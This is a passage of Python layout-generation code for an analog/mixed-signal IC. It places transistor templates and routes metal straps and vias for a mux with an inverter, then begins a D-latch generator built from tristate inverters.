    in6 = laygen.relplace(name = "I"+objectname_pfix + 'N6', templatename = devname_nmos_body, gridname = pg, refinstname = in5b.name, transform='MY', shape=np.array([m, 1]))
    in7 = laygen.relplace(name = "I"+objectname_pfix + 'N7', templatename = devname_nmos_boundary, gridname = pg, refinstname = in6.name, transform='MY')
    in8 = laygen.relplace(name = "I"+objectname_pfix + 'N8', templatename = devname_nmos_boundary, gridname = pg, refinstname = in7.name)
    in9 = laygen.relplace(name = "I"+objectname_pfix + 'N9', templatename = devname_nmos_body, gridname = pg, refinstname = in8.name, shape=np.array([m, 1]))
    in10 = laygen.relplace(name = "I"+objectname_pfix + 'N10', templatename = devname_nmos_boundary, gridname = pg, refinstname = in9.name)
    ip0 = laygen.relplace(name = "I"+objectname_pfix + 'P0', templatename = devname_pmos_boundary, gridname = pg, refinstname = in0.name, direction='top', transform='MX')
    ip1 = laygen.relplace(name = "I"+objectname_pfix + 'P1', templatename = devname_pmos_body, gridname = pg, refinstname = ip0.name, transform='MX', shape=np.array([m, 1]))
    ip1a = laygen.relplace(name = "I"+objectname_pfix + 'P1A', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip1.name, transform='MX')
    ip1b = laygen.relplace(name = "I"+objectname_pfix + 'P1B', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip1a.name, transform='MX')
    ip2 = laygen.relplace(name = "I"+objectname_pfix + 'P2', templatename = devname_pmos_body, gridname = pg, refinstname = ip1b.name, transform='MX', shape=np.array([m, 1]))
    ip3 = laygen.relplace(name = "I"+objectname_pfix + 'P3', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip2.name, transform='MX')
    ip_rte = laygen.relplace(name = "I"+objectname_pfix + 'PRTE', templatename = devname_pmos_space, gridname = pg, refinstname = ip3.name, shape=np.array([4, 1]), transform='MX')
    ip4 = laygen.relplace(name = "I"+objectname_pfix + 'P4', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip_rte.name, transform='R180')
    ip5 = laygen.relplace(name = "I"+objectname_pfix + 'P5', templatename = devname_pmos_body, gridname = pg, refinstname = ip4.name, transform='R180', shape=np.array([m, 1]))
    ip5a = laygen.relplace(name = "I"+objectname_pfix + 'P5A', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip5.name, transform='R180')
    ip5b = laygen.relplace(name = "I"+objectname_pfix + 'P5B', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip5a.name, transform='R180')
    ip6 = laygen.relplace(name = "I"+objectname_pfix + 'P6', templatename = devname_pmos_body, gridname = pg, refinstname = ip5b.name, transform='R180', shape=np.array([m, 1]))
    ip7 = laygen.relplace(name = "I"+objectname_pfix + 'P7', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip6.name, transform='R180')
    ip8 = laygen.relplace(name = "I"+objectname_pfix + 'P8', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip7.name, transform='MX')
    ip9 = laygen.relplace(name = "I"+objectname_pfix + 'P9', templatename = devname_pmos_body, gridname = pg, refinstname = ip8.name, transform='MX', shape=np.array([m, 1]))
    ip10 = laygen.relplace(name = "I"+objectname_pfix + 'P10', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip9.name, transform='MX')
    # in0: tie in1/ip1 gates vertically on M1, strap on M2, M3 stub becomes I0 pin rect
    for i in range(m):
        laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2,
                     refinstname0=in1.name, refpinname0='G0', refinstindex0=np.array([i, 0]),
                     refinstname1=ip1.name, refpinname1='G0', refinstindex1=np.array([i, 0]), )
        laygen.via(None, np.array([0, 1]), refinstname=in1.name, refpinname='G0', refinstindex=np.array([i, 0]), gridname=rg_m1m2)
    if m==1:
        # single-finger case: extend the M2 strap one track each way so the via landing is legal
        laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 1]), xy1=np.array([1, 1]), gridname0=rg_m1m2,
                     refinstname0=in1.name, refpinname0='G0', refinstindex0=np.array([0, 0]),
                     refinstname1=in1.name, refpinname1='G0', refinstindex1=np.array([m-1, 0]), endstyle0="extend", endstyle1="extend")
        ri0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([-1, 0]), xy1=np.array([-1, 2]), gridname0=rg_m2m3,
                           refinstname0=in1.name, refpinname0='G0', refinstname1=in1.name, refpinname1='G0')
        laygen.via(None, np.array([-1, 1]), refinstname=in1.name, refpinname='G0', gridname=rg_m2m3)
    else:
        laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 1]), xy1=np.array([0, 1]), gridname0=rg_m1m2,
                     refinstname0=in1.name, refpinname0='G0', refinstindex0=np.array([0, 0]),
                     refinstname1=in1.name, refpinname1='G0', refinstindex1=np.array([m-1, 0]))
        ri0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 2]), gridname0=rg_m2m3,
                           refinstname0=in1.name, refpinname0='G0', refinstname1=in1.name, refpinname1='G0')
        laygen.via(None, np.array([0, 1]), refinstname=in1.name, refpinname='G0', gridname=rg_m2m3)
    # in1: same gate tie for the second input branch (in6/ip6); M3 stub becomes I1 pin rect
    for i in range(m):
        laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2,
                     refinstname0=in6.name, refpinname0='G0', refinstindex0=np.array([i, 0]),
                     refinstname1=ip6.name, refpinname1='G0', refinstindex1=np.array([i, 0]), )
        laygen.via(None, np.array([0, 1]), refinstname=in6.name, refpinname='G0', refinstindex=np.array([i, 0]), gridname=rg_m1m2)
    if m==1:
        laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 1]), xy1=np.array([1, 1]), gridname0=rg_m1m2,
                     refinstname0=in6.name, refpinname0='G0', refinstindex0=np.array([0, 0]),
                     refinstname1=in6.name, refpinname1='G0', refinstindex1=np.array([m-1, 0]), endstyle0="extend", endstyle1="extend")
        ri1 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([-1, 0]), xy1=np.array([-1, 2]), gridname0=rg_m2m3,
                           refinstname0=in6.name, refpinname0='G0', refinstname1=in6.name, refpinname1='G0')
        laygen.via(None, np.array([-1, 1]), refinstname=in6.name, refpinname='G0', gridname=rg_m2m3)
    else:
        laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 1]), xy1=np.array([0, 1]), gridname0=rg_m1m2,
                     refinstname0=in6.name, refpinname0='G0', refinstindex0=np.array([0, 0]),
                     refinstname1=in6.name, refpinname1='G0', refinstindex1=np.array([m-1, 0]))
        ri1 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 2]), gridname0=rg_m2m3,
                           refinstname0=in6.name, refpinname0='G0', refinstname1=in6.name, refpinname1='G0')
        laygen.via(None, np.array([0, 1]), refinstname=in6.name, refpinname='G0', gridname=rg_m2m3)
    # en0: M2 strap on the in2 gates (extends 4 tracks right toward the cross-couple region)
    for i in range(m):
        laygen.via(None, np.array([0, 0]), refinstname=in2.name, refpinname='G0', refinstindex=np.array([i, 0]), gridname=rg_m1m2)
    ren0_m2 = laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([4, 0]), gridname0=rg_m1m2,
                           refinstname0=in2.name, refpinname0='G0', refinstindex0=np.array([0, 0]),
                           refinstname1=in2.name, refpinname1='G0', refinstindex1=np.array([m - 1, 0]))
    # en1: M2 strap on the in5 gates (2-track extension)
    for i in range(m):
        laygen.via(None, np.array([0, 0]), refinstname=in5.name, refpinname='G0', refinstindex=np.array([i, 0]), gridname=rg_m1m2)
    ren1_m2 = laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([2, 0]), gridname0=rg_m1m2,
                           refinstname0=in5.name, refpinname0='G0', refinstindex0=np.array([0, 0]),
                           refinstname1=in5.name, refpinname1='G0', refinstindex1=np.array([m - 1, 0]))
    # enb0: M2 strap on the ip2 gates
    for i in range(m):
        laygen.via(None, np.array([0, 0]), refinstname=ip2.name, refpinname='G0', refinstindex=np.array([i, 0]), gridname=rg_m1m2)
    renb0_m2 = laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([2, 0]), gridname0=rg_m1m2,
                            refinstname0=ip2.name, refpinname0='G0', refinstindex0=np.array([0, 0]),
                            refinstname1=ip2.name, refpinname1='G0', refinstindex1=np.array([m - 1, 0]))
    # enb1: M2 strap on the ip5 gates
    for i in range(m):
        laygen.via(None, np.array([0, 0]), refinstname=ip5.name, refpinname='G0', refinstindex=np.array([i, 0]), gridname=rg_m1m2)
    renb1_m2 = laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([4, 0]), gridname0=rg_m1m2,
                            refinstname0=ip5.name, refpinname0='G0', refinstindex0=np.array([0, 0]),
                            refinstname1=ip5.name, refpinname1='G0', refinstindex1=np.array([m - 1, 0]))
    # internal connection between stacked mos (drain-to-drain M2 straps plus per-finger vias)
    laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 1]), xy1=np.array([0, 1]), gridname0=rg_m2m3,
                 refinstname0=in1.name, refpinname0='D0', refinstname1=in2.name, refpinname1='D0', refinstindex1=np.array([m - 1, 0]))
    laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 1]), xy1=np.array([0, 1]), gridname0=rg_m2m3,
                 refinstname0=ip1.name, refpinname0='D0', refinstname1=ip2.name, refpinname1='D0', refinstindex1=np.array([m - 1, 0]))
    laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 1]), xy1=np.array([0, 1]), gridname0=rg_m2m3,
                 refinstname0=in6.name, refpinname0='D0', refinstname1=in5.name, refpinname1='D0', refinstindex1=np.array([m - 1, 0]))
    laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 1]), xy1=np.array([0, 1]), gridname0=rg_m2m3,
                 refinstname0=ip6.name, refpinname0='D0', refinstname1=ip5.name, refpinname1='D0', refinstindex1=np.array([m - 1, 0]))
    for i in range(m):
        laygen.via(None, np.array([0, 1]), refinstname=in1.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2)
        laygen.via(None, np.array([0, 1]), refinstname=ip1.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2)
        laygen.via(None, np.array([0, 1]), refinstname=in2.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2)
        laygen.via(None, np.array([0, 1]), refinstname=ip2.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2)
        laygen.via(None, np.array([0, 1]), refinstname=in5.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2)
        laygen.via(None, np.array([0, 1]), refinstname=ip5.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2)
        laygen.via(None, np.array([0, 1]), refinstname=in6.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2)
        laygen.via(None, np.array([0, 1]), refinstname=ip6.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2)
    # mux output: join the two branch source nodes (in2/in5 and ip2/ip5) and drop an M3 rect
    laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3,
                 refinstname0=in2.name, refpinname0='S0', refinstname1=in5.name, refpinname1='S0')
    laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3,
                 refinstname0=ip2.name, refpinname0='S0', refinstname1=ip5.name, refpinname1='S0')
    rmuxo0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3,
                          refinstname0=in5.name, refpinname0='S0', refinstindex0=np.array([m - 1, 0]),
                          refinstname1=ip5.name, refpinname1='S0', refinstindex1=np.array([m - 1, 0]))
    for i in range(m):
        laygen.via(None, np.array([0, 0]), refinstname=in2.name, refpinname='S0', refinstindex=np.array([i, 0]), gridname=rg_m1m2)
        laygen.via(None, np.array([0, 0]), refinstname=ip2.name, refpinname='S0', refinstindex=np.array([i, 0]), gridname=rg_m1m2)
        laygen.via(None, np.array([0, 0]), refinstname=in5.name, refpinname='S0', refinstindex=np.array([i, 0]), gridname=rg_m1m2)
        laygen.via(None, np.array([0, 0]), refinstname=ip5.name, refpinname='S0', refinstindex=np.array([i, 0]), gridname=rg_m1m2)
    laygen.via(None, np.array([0, 0]), refinstname=in2.name, refpinname='S1', gridname=rg_m1m2, refinstindex=np.array([m - 1, 0]))
    laygen.via(None, np.array([0, 0]), refinstname=ip2.name, refpinname='S1', gridname=rg_m1m2, refinstindex=np.array([m - 1, 0]))
    laygen.via(None, np.array([0, 0]), refinstname=in5.name, refpinname='S1', gridname=rg_m1m2, refinstindex=np.array([m - 1, 0]))
    laygen.via(None, np.array([0, 0]), refinstname=ip5.name, refpinname='S1', gridname=rg_m1m2, refinstindex=np.array([m - 1, 0]))
    laygen.via(None, np.array([0, 0]), refinstname=in5.name, refpinname='S0', gridname=rg_m2m3, refinstindex=np.array([m - 1, 0]))
    laygen.via(None, np.array([0, 0]), refinstname=ip5.name, refpinname='S0', gridname=rg_m2m3, refinstindex=np.array([m - 1, 0]))
    # inverter input: tie in9/ip9 gates; M3 rect rinvi0 is later tied to the mux output
    for i in range(m):
        laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2,
                     refinstname0=in9.name, refpinname0='G0', refinstindex0=np.array([i, 0]),
                     refinstname1=ip9.name, refpinname1='G0', refinstindex1=np.array([i, 0]), )
        laygen.via(None, np.array([0, 0]), refinstname=in9.name, refpinname='G0', refinstindex=np.array([i, 0]), gridname=rg_m1m2)
    if m==1:
        laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 0]), xy1=np.array([1, 0]), gridname0=rg_m1m2,
                     refinstname0=in9.name, refpinname0='G0', refinstindex0=np.array([0, 0]),
                     refinstname1=in9.name, refpinname1='G0', refinstindex1=np.array([m-1, 0]), endstyle0="extend", endstyle1="extend")
        rinvi0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([-1, 0]), xy1=np.array([-1, 4]), gridname0=rg_m2m3,
                              refinstname0=in9.name, refpinname0='G0', refinstname1=in9.name, refpinname1='G0')
        laygen.via(None, np.array([-1, 0]), refinstname=in9.name, refpinname='G0', gridname=rg_m2m3)
    else:
        laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2,
                     refinstname0=in9.name, refpinname0='G0', refinstindex0=np.array([0, 0]),
                     refinstname1=in9.name, refpinname1='G0', refinstindex1=np.array([m-1, 0]))
        rinvi0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 4]), gridname0=rg_m2m3,
                              refinstname0=in9.name, refpinname0='G0', refinstname1=in9.name, refpinname1='G0')
        laygen.via(None, np.array([0, 0]), refinstname=in9.name, refpinname='G0', gridname=rg_m2m3)
    #inverter output
    if m==1:
        laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 1]), xy1=np.array([1, 1]), gridname0=rg_m2m3,
                     refinstname0=in9.name, refpinname0='D0', refinstindex0=np.array([0, 0]),
                     refinstname1=in9.name, refpinname1='D0', refinstindex1=np.array([m-1, 0]), endstyle0="extend", endstyle1="extend")
        laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 1]), xy1=np.array([1, 1]), gridname0=rg_m2m3,
                     refinstname0=ip9.name, refpinname0='D0', refinstindex0=np.array([0, 0]),
                     refinstname1=ip9.name, refpinname1='D0', refinstindex1=np.array([m-1, 0]), endstyle0="extend", endstyle1="extend")
    else:
        laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 1]), xy1=np.array([0, 1]), gridname0=rg_m2m3,
                     refinstname0=in9.name, refpinname0='D0', refinstindex0=np.array([0, 0]),
                     refinstname1=in9.name, refpinname1='D0', refinstindex1=np.array([m-1, 0]))
        laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 1]), xy1=np.array([0, 1]), gridname0=rg_m2m3,
                     refinstname0=ip9.name, refpinname0='D0',
                     refinstindex0=np.array([0, 0]), refinstname1=ip9.name, refpinname1='D0', refinstindex1=np.array([m-1, 0]))
    for i in range(m):
        # NOTE(review): y-index 1 in refinstindex with shape (m, 1) arrays looks suspicious --
        # every other section uses np.array([i, 0]); confirm this is intentional.
        laygen.via(None, np.array([0, 1]), refinstname=in9.name, refpinname='D0', refinstindex=np.array([i, 1]), gridname=rg_m1m2)
        laygen.via(None, np.array([0, 1]), refinstname=ip9.name, refpinname='D0', refinstindex=np.array([i, 1]), gridname=rg_m1m2)
    laygen.via(None, np.array([0, 1]), refinstname=in9.name, refpinname='D0', refinstindex=np.array([m-1, 1]), gridname=rg_m2m3)
    laygen.via(None, np.array([0, 1]), refinstname=ip9.name, refpinname='D0', refinstindex=np.array([m-1, 1]), gridname=rg_m2m3)
    ro0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 1]), xy1=np.array([0, 1]), gridname0=rg_m2m3,
                       refinstname0=in9.name, refpinname0='D0', refinstindex0=np.array([m-1, 0]),
                       refinstname1=ip9.name, refpinname1='D0', refinstindex1=np.array([m-1, 0]))
    # en/enb cross couple: tie ENB0 to EN1 (vhv jog on M3/M2) and EN0 to ENB1 (straight M3),
    # so only EN0/EN1 need to be driven externally
    ren0_m2m3_xy = laygen.get_xy(obj = ren0_m2, gridname = rg_m2m3, sort=True)
    ren1_m2m3_xy = laygen.get_xy(obj = ren1_m2, gridname = rg_m2m3, sort=True)
    renb0_m2m3_xy = laygen.get_xy(obj = renb0_m2, gridname = rg_m2m3, sort=True)
    renb1_m2m3_xy = laygen.get_xy(obj = renb1_m2, gridname = rg_m2m3, sort=True)
    [rv0, rh0, renb0] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][2], renb0_m2m3_xy[1],
                                         ren1_m2m3_xy[0], renb0_m2m3_xy[0][1]+1, rg_m2m3)
    laygen.via(None, xy=np.array(renb0_m2m3_xy[1]), gridname=rg_m2m3)
    laygen.via(None, xy=np.array(ren1_m2m3_xy[0]), gridname=rg_m2m3)
    ren0 = laygen.route(None, laygen.layers['metal'][3], xy0=ren0_m2m3_xy[1], xy1=renb1_m2m3_xy[0], gridname0=rg_m2m3,
                        via0=[[0, 0]], via1=[[0, 0]])
    # muxout to invin: connect the shared mux output rect to the inverter-input rect on M2
    rmuxo0_m2m3_xy = laygen.get_xy(obj = rmuxo0, gridname = rg_m2m3, sort=True)
    rinvi0_m2m3_xy = laygen.get_xy(obj = rinvi0, gridname = rg_m2m3, sort=True)
    laygen.route(None, laygen.layers['metal'][2], xy0=rmuxo0_m2m3_xy[1], xy1=rinvi0_m2m3_xy[1], gridname0=rg_m2m3, via1=[[0, 0]])
    # power and ground route: per-finger M1 stubs from each S0 down/up to the rails
    xy_s0 = laygen.get_template_pin_xy(in1.cellname, 'S0', rg_m1m2)[0, :]
    for i in range(m):
        laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0 * np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2,
                     refinstname0=in1.name, refinstindex0=np.array([i, 0]), refinstname1=in1.name, refinstindex1=np.array([i, 0]))
        laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0 * np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2,
                     refinstname0=ip1.name, refinstindex0=np.array([i, 0]), refinstname1=ip1.name, refinstindex1=np.array([i, 0]))
        laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=in1.name, gridname=rg_m1m2, refinstindex=np.array([i, 0]))
        laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=ip1.name, gridname=rg_m1m2, refinstindex=np.array([i, 0]))
        laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0 * np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2,
                     refinstname0=in6.name, refinstindex0=np.array([i, 0]), refinstname1=in6.name, refinstindex1=np.array([i, 0]))
        laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0 * np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2,
                     refinstname0=ip6.name, refinstindex0=np.array([i, 0]), refinstname1=ip6.name, refinstindex1=np.array([i, 0]))
        laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=in6.name, gridname=rg_m1m2, refinstindex=np.array([i, 0]))
        laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=ip6.name, gridname=rg_m1m2, refinstindex=np.array([i, 0]))
        laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0 * np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2,
                     refinstname0=in9.name, refinstindex0=np.array([i, 0]), refinstname1=in9.name, refinstindex1=np.array([i, 0]))
        laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0 * np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2,
                     refinstname0=ip9.name, refinstindex0=np.array([i, 0]), refinstname1=ip9.name, refinstindex1=np.array([i, 0]))
        laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=in9.name, gridname=rg_m1m2, refinstindex=np.array([i, 0]))
        laygen.via(None, xy_s0 * np.array([1, 0]),
                   refinstname=ip9.name, gridname=rg_m1m2, refinstindex=np.array([i, 0]))
    # same rail stubs for the rightmost S1 source contacts
    xy_s1 = laygen.get_template_pin_xy(in1.cellname, 'S1', rg_m1m2)[0, :]
    laygen.route(None, laygen.layers['metal'][1], xy0=xy_s1 * np.array([1, 0]), xy1=xy_s1, gridname0=rg_m1m2,
                 refinstname0=in1.name, refinstindex0=np.array([m - 1, 0]), refinstname1=in1.name, refinstindex1=np.array([m - 1, 0]))
    laygen.route(None, laygen.layers['metal'][1], xy0=xy_s1 * np.array([1, 0]), xy1=xy_s1, gridname0=rg_m1m2,
                 refinstname0=ip1.name, refinstindex0=np.array([m - 1, 0]), refinstname1=ip1.name, refinstindex1=np.array([m - 1, 0]))
    laygen.via(None, xy_s1 * np.array([1, 0]), refinstname=in1.name, gridname=rg_m1m2, refinstindex=np.array([m - 1, 0]))
    laygen.via(None, xy_s1 * np.array([1, 0]), refinstname=ip1.name, gridname=rg_m1m2, refinstindex=np.array([m - 1, 0]))
    laygen.route(None, laygen.layers['metal'][1], xy0=xy_s1 * np.array([1, 0]), xy1=xy_s1, gridname0=rg_m1m2,
                 refinstname0=in6.name, refinstindex0=np.array([m - 1, 0]), refinstname1=in6.name, refinstindex1=np.array([m - 1, 0]))
    laygen.route(None, laygen.layers['metal'][1], xy0=xy_s1 * np.array([1, 0]), xy1=xy_s1, gridname0=rg_m1m2,
                 refinstname0=ip6.name, refinstindex0=np.array([m - 1, 0]), refinstname1=ip6.name, refinstindex1=np.array([m - 1, 0]))
    laygen.via(None, xy_s1 * np.array([1, 0]), refinstname=in6.name, gridname=rg_m1m2, refinstindex=np.array([m - 1, 0]))
    laygen.via(None, xy_s1 * np.array([1, 0]), refinstname=ip6.name, gridname=rg_m1m2, refinstindex=np.array([m - 1, 0]))
    laygen.route(None, laygen.layers['metal'][1], xy0=xy_s1 * np.array([1, 0]), xy1=xy_s1, gridname0=rg_m1m2,
                 refinstname0=in9.name, refinstindex0=np.array([m - 1, 0]), refinstname1=in9.name, refinstindex1=np.array([m - 1, 0]))
    laygen.route(None, laygen.layers['metal'][1], xy0=xy_s1 * np.array([1, 0]), xy1=xy_s1, gridname0=rg_m1m2,
                 refinstname0=ip9.name, refinstindex0=np.array([m - 1, 0]), refinstname1=ip9.name, refinstindex1=np.array([m - 1, 0]))
    laygen.via(None, xy_s1 * np.array([1, 0]),
refinstname=in9.name, gridname=rg_m1m2, refinstindex=np.array([m - 1, 0]))
    laygen.via(None, xy_s1 * np.array([1, 0]), refinstname=ip9.name, gridname=rg_m1m2, refinstindex=np.array([m - 1, 0]))
    # power and ground rail: M2 straps from the left boundary to the rightmost boundary cell
    xy = laygen.get_xy(obj = in10.template, gridname = rg_m1m2) * np.array([1, 0])
    rvdd = laygen.route("R"+objectname_pfix+"VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2,
                        refinstname0=ip0.name, refinstname1=ip10.name)
    rvss = laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2,
                        refinstname0=in0.name, refinstname1=in10.name)
    #pin creation (optional): I/O on M3, power rails on M2
    if create_pin == True:
        create_io_pin(laygen, layer=laygen.layers['pin'][3], gridname=rg_m2m3_pin,
                      pinname_list = ['I0', 'I1', 'EN0', 'EN1', 'O'], rect_list=[ri0, ri1, ren0, renb0, ro0])
        create_power_pin(laygen, layer=laygen.layers['pin'][2], gridname=rg_m1m2, rect_vdd=rvdd, rect_vss=rvss)

def generate_latch_2ck(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, routing_grid_m2m3, routing_grid_m3m4,origin=np.array([0, 0]), m=4,
                       pin_clk_y=3, pin_clkb_y=2, route_mem_y=4, pin_o_y=5, create_pin=False):
    """generate D latch (complementary clock)

    Built from pre-generated templates: a tristate inverter (TINV0, input
    stage), a minimum-size tristate inverter (TINV1, feedback keeper) and an
    inverter (INV0, output stage).  CLK/CLKB run horizontally on M4 at the
    grid rows given by pin_clk_y/pin_clkb_y; the storage node and the output
    net use M4 rows route_mem_y and pin_o_y with M3 drops to the cell pins.

    Parameters:
        laygen: layout generator object providing place/relplace/route/via/pin
        objectname_pfix: string prefix for generated instance names
        placement_grid, routing_grid_m1m2/_m2m3/_m3m4: grid names
        origin: placement origin on the placement grid
        m: drive-strength multiplier selecting the tinv_/inv_ template size
        pin_clk_y, pin_clkb_y, route_mem_y, pin_o_y: M3/M4 grid y-tracks
            used for the CLK, CLKB, storage and output routes
        create_pin: if True, create I/CLK/CLKB/O and VDD/VSS pins
    """
    pg = placement_grid
    rg_m1m2 = routing_grid_m1m2
    rg_m2m3 = routing_grid_m2m3
    rg_m3m4 = routing_grid_m3m4
    # placement
    i0 = laygen.place("I"+objectname_pfix + 'TINV0', "tinv_"+str(m)+"x", pg, xy=origin)
    #i1 = laygen.relplace(name = "I"+objectname_pfix + 'TINV1', templatename = "tinv_1x_nmosinput", gridname = pg, refinstname = i0.name) #used minimum size
    #i2 = laygen.relplace(name = "I"+objectname_pfix + 'INV0', templatename = "inv_"+str(m)+"x_pmosinput", gridname = pg, refinstname = i1.name)
    i1 = laygen.relplace(name = "I"+objectname_pfix + 'TINV1', templatename = "tinv_small_1x", gridname = pg, refinstname = i0.name) #used minimum size
    i2 = laygen.relplace(name = "I"+objectname_pfix + 'INV0', templatename = "inv_"+str(m)+"x", gridname = pg, refinstname = i1.name)
    # internal pins (xy on the m3m4 grid for each template pin)
    tinv0_i_xy = laygen.get_inst_pin_xy(i0.name, 'I', rg_m3m4)
    tinv0_en_xy = laygen.get_inst_pin_xy(i0.name, 'EN', rg_m3m4)
    tinv0_enb_xy = laygen.get_inst_pin_xy(i0.name, 'ENB', rg_m3m4)
    tinv0_o_xy = laygen.get_inst_pin_xy(i0.name, 'O', rg_m3m4)
    tinv1_i_xy = laygen.get_inst_pin_xy(i1.name, 'I', rg_m3m4)
    tinv1_en_xy = laygen.get_inst_pin_xy(i1.name, 'EN', rg_m3m4)
    tinv1_enb_xy = laygen.get_inst_pin_xy(i1.name, 'ENB', rg_m3m4)
    tinv1_o_xy = laygen.get_inst_pin_xy(i1.name, 'O', rg_m3m4)
    inv0_i_xy = laygen.get_inst_pin_xy(i2.name, 'I', rg_m3m4)
    inv0_o_xy = laygen.get_inst_pin_xy(i2.name, 'O', rg_m3m4)
    #clk: M4 trunk to TINV0.EN and TINV1.ENB, with M3 drops and vias
    rclk0=laygen.route(None, laygen.layers['metal'][4], xy0=np.array([tinv0_en_xy[0][0], pin_clk_y]),
                       xy1=np.array([tinv1_enb_xy[0][0], pin_clk_y]), gridname0=rg_m3m4)
    laygen.route(None, laygen.layers['metal'][3], xy0=np.array([tinv0_en_xy[0][0], pin_clk_y]), xy1=tinv0_en_xy[0], gridname0=rg_m3m4)
    laygen.route(None, laygen.layers['metal'][3], xy0=np.array([tinv1_enb_xy[0][0], pin_clk_y]), xy1=tinv1_enb_xy[0], gridname0=rg_m3m4)
    laygen.via(None, np.array([tinv0_en_xy[0][0], pin_clk_y]), gridname=rg_m3m4)
    laygen.via(None, np.array([tinv1_enb_xy[0][0], pin_clk_y]), gridname=rg_m3m4)
    #clkb: M4 trunk to TINV0.ENB and TINV1.EN (opposite phase on the keeper)
    rclkb0=laygen.route(None, laygen.layers['metal'][4], xy0=np.array([tinv0_enb_xy[0][0], pin_clkb_y]),
                        xy1=np.array([tinv1_en_xy[0][0], pin_clkb_y]), gridname0=rg_m3m4)
    laygen.route(None, laygen.layers['metal'][3], xy0=np.array([tinv0_enb_xy[0][0], pin_clkb_y]), xy1=tinv0_enb_xy[0], gridname0=rg_m3m4)
    laygen.route(None, laygen.layers['metal'][3], xy0=np.array([tinv1_en_xy[0][0], pin_clkb_y]), xy1=tinv1_en_xy[0], gridname0=rg_m3m4)
    laygen.via(None, np.array([tinv0_enb_xy[0][0], pin_clkb_y]), gridname=rg_m3m4)
    laygen.via(None, np.array([tinv1_en_xy[0][0], pin_clkb_y]), gridname=rg_m3m4)
    #storage node: TINV0.O, TINV1.O and INV0.I tied on the route_mem_y M4 track
    laygen.route(None, laygen.layers['metal'][4], xy0=np.array([tinv0_o_xy[0][0], route_mem_y]),
                 xy1=np.array([inv0_i_xy[0][0], route_mem_y]), gridname0=rg_m3m4)
